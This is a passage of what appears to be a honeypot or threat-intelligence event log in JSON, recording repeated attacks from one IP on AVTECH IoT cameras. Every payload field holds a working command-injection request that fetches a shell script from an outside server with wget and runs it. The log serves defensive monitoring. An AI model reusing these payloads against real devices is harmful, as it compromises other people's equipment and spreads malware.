- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 10000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:18:14Z",
- "last_seen": "2020-06-01T05:30:55Z"
- },
- {
- "event_id": "8ab74190c22e432afc8cd1caa7c92bbdb2cc385a23f94eb5757e110bbbfa6a6f",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 5984,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:02:57Z",
- "last_seen": "2020-06-01T05:30:32Z"
- },
- {
- "event_id": "2ce2b67393db0597c83ccbb5a1757597d97ba4778f6c109b338c9a04cd4fe88d",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 5984,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:02:49Z",
- "last_seen": "2020-06-01T05:30:25Z"
- },
- {
- "event_id": "ecc35cd979ba20c607252e7f8376094516a2d9dfc000f2d71647681ec7a639f4",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 5431,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:16:06Z",
- "last_seen": "2020-06-01T05:28:55Z"
- },
- {
- "event_id": "1a708aa5570a71c6f5e46144af4da6c9876c97103718db30ec6b31cffea1feb5",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 5431,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:15:59Z",
- "last_seen": "2020-06-01T05:28:50Z"
- },
- {
- "event_id": "155136251cfa4c078aea285ed05b1b00d676a0b69afa8088164bc5958313d3eb",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8779,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:28:45Z",
- "last_seen": "2020-06-01T05:28:45Z"
- },
- {
- "event_id": "461b57ee5b371299f8d838b1ee1a16b80ac4b0e79e4afb4caeadd2eee3205d75",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 2087,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:02:38Z",
- "last_seen": "2020-06-01T05:28:40Z"
- },
- {
- "event_id": "144a20753a418a93210129383042d66bad5b9b757817faaa9a5674edf0859e4f",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8779,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:28:40Z",
- "last_seen": "2020-06-01T05:28:40Z"
- },
- {
- "event_id": "90b9db26581675031c409e3a2ee322ba1a333a4e0a70de37423bb5ccd313413c",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 2087,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:02:30Z",
- "last_seen": "2020-06-01T05:28:34Z"
- },
- {
- "event_id": "292542de228769d0bd0ef737b0cf220a190c3b5b9bd1ce5e19186220321ff9dd",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 2626,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:28:28Z",
- "last_seen": "2020-06-01T05:28:28Z"
- },
- {
- "event_id": "d93c58d065640d51dccea99e2f5f0305738a7c42c3333a7df56817a6eb38b0d4",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 2626,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:28:23Z",
- "last_seen": "2020-06-01T05:28:23Z"
- },
- {
- "event_id": "fb8b4aebd29e118403a3c8d1b4f4a85d628b1e383729b02f9fc5f7efa1624252",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:01:17Z",
- "last_seen": "2020-06-01T05:28:17Z"
- },
- {
- "event_id": "b2922173b6871936cd5b106b7f80c27292acc9e35d552634c64d67460c010e9b",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8623,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:28:16Z",
- "last_seen": "2020-06-01T05:28:16Z"
- },
- {
- "event_id": "a5b1e34bc1a1533f62c164d5cb42551ff733a0a98e2fa2b37aab3f3a232a1ec8",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:01:09Z",
- "last_seen": "2020-06-01T05:28:12Z"
- },
- {
- "event_id": "70b375b1c3a547c5f5239199682ce31b2c77b3177ef966e4b0b1f1737e585551",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8623,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:28:10Z",
- "last_seen": "2020-06-01T05:28:10Z"
- },
- {
- "event_id": "008e7678942001d6e4eccca5d5179f3833b8a701af4e96b21492a5c88ffd39c6",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 4567,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:09:18Z",
- "last_seen": "2020-06-01T05:27:55Z"
- },
- {
- "event_id": "e2b761072243931d8b70ec663af5276003428695e8b9757d8ac081cbe474625c",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 4567,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:09:11Z",
- "last_seen": "2020-06-01T05:27:49Z"
- },
- {
- "event_id": "50094628c6c696e4085b2fc940583c385145b5859a18408cd4eb0f5544edc813",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:03:10Z",
- "last_seen": "2020-06-01T05:27:36Z"
- },
- {
- "event_id": "7bb54b269a449f5ae24f60eccbc846701924a2723b655483e02e18eca1f984ec",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 60001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:16:31Z",
- "last_seen": "2020-06-01T05:27:34Z"
- },
- {
- "event_id": "5e5f1319935f6abcae16d524870ba3eece3fc0263e9a05abc8ac23d5112e65aa",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:03:03Z",
- "last_seen": "2020-06-01T05:27:31Z"
- },
- {
- "event_id": "023519dbb6039fb9cb00696a8ca354c73e57e02066c001795222223df758af85",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8112,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:05:51Z",
- "last_seen": "2020-06-01T05:27:30Z"
- },
- {
- "event_id": "50d1de65c30df4b9776f2f54c965104789f8bca90d4da79dd5d0985c047a5761",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 60001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:16:23Z",
- "last_seen": "2020-06-01T05:27:26Z"
- },
- {
- "event_id": "4b3f109d910c9a29ffa3633fb41659a61781c942e179b55880ff1336e21a5874",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8112,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:05:44Z",
- "last_seen": "2020-06-01T05:27:23Z"
- },
- {
- "event_id": "5ac2312b79a756ccfd56810ab7095de67db75f9c7d3c2633e1deba6502171983",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 84,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:16:46Z",
- "last_seen": "2020-06-01T05:27:16Z"
- },
- {
- "event_id": "4b714eea55b58679ceda9614254932f88e1707c9256f74f395d273fe34f2f901",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 84,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:16:37Z",
- "last_seen": "2020-06-01T05:27:11Z"
- },
- {
- "event_id": "a657a96293e5435ab7829ab3e05c32c6cdb918684ac88ed99a9ce387b828b320",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 5555,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:02:33Z",
- "last_seen": "2020-06-01T05:27:09Z"
- },
- {
- "event_id": "b9ef461f02b380dbb39f88ca01fd1c8184ec7b350203972f431e2b3efed3645a",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 5555,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:02:25Z",
- "last_seen": "2020-06-01T05:27:03Z"
- },
- {
- "event_id": "963bb318fe67967ec96af0b628927bccd1cdba2e045088218a1ae412e7d0b3ea",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 2082,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:02:04Z",
- "last_seen": "2020-06-01T05:26:57Z"
- },
- {
- "event_id": "09aac9ae166c5ee3a275e5e64a3737f0c443c030561417a838751928d16499be",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 2082,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:01:56Z",
- "last_seen": "2020-06-01T05:26:51Z"
- },
- {
- "event_id": "7582f18c197f0b12cd74e827925de8a3bc8feccd0868a75125ec4c2f8d279a79",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 1400,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:17:47Z",
- "last_seen": "2020-06-01T05:26:46Z"
- },
- {
- "event_id": "a2be4531ef6a428d665397cc52c1a8b7a6c2b8b45e9d9654d6103634181bd875",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 1400,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:17:40Z",
- "last_seen": "2020-06-01T05:26:39Z"
- },
- {
- "event_id": "80f9f2bc7b1565b90b541e4e003e5293195903ab9ce7e64ac7d6d0a32daa5484",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8081,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 5,
- "first_seen": "2020-06-01T05:09:21Z",
- "last_seen": "2020-06-01T05:26:37Z"
- },
- {
- "event_id": "6c07f39e7d574bdaf0b0194fb6cc295560ba355117a5d8d8cffdbc1a572ecc0e",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8081,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 5,
- "first_seen": "2020-06-01T05:09:13Z",
- "last_seen": "2020-06-01T05:26:32Z"
- },
- {
- "event_id": "01f668ca735fa9b3585f7f3f60c54e8384067dccd31d2adc2128b8ff56558377",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9090,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:05:48Z",
- "last_seen": "2020-06-01T05:24:45Z"
- },
- {
- "event_id": "04859e9632f8d3a1bcd2f0b4e002c0af091f6f158c8998ddbf2ef9300304d177",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9090,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:05:42Z",
- "last_seen": "2020-06-01T05:24:38Z"
- },
- {
- "event_id": "c301ad57b5709682dc90c91b47325e11eedcbf72b3ceaf304d317fab99742625",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:12:04Z",
- "last_seen": "2020-06-01T05:24:31Z"
- },
- {
- "event_id": "ed579cd9a2eb376ae4062ab5dbef0cdd2af46b42356b01b9bf47613edc1aa436",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:11:57Z",
- "last_seen": "2020-06-01T05:24:24Z"
- },
- {
- "event_id": "6ada188b5de68712db1c78d66ecfef9537490e1f1feaf5635f0628e1d3b3e299",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 5,
- "first_seen": "2020-06-01T05:07:16Z",
- "last_seen": "2020-06-01T05:24:12Z"
- },
- {
- "event_id": "03c38a685839caa2c51e5dd005f9be2f852fb2050d8dffdfed95cce3bbeddd46",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 5,
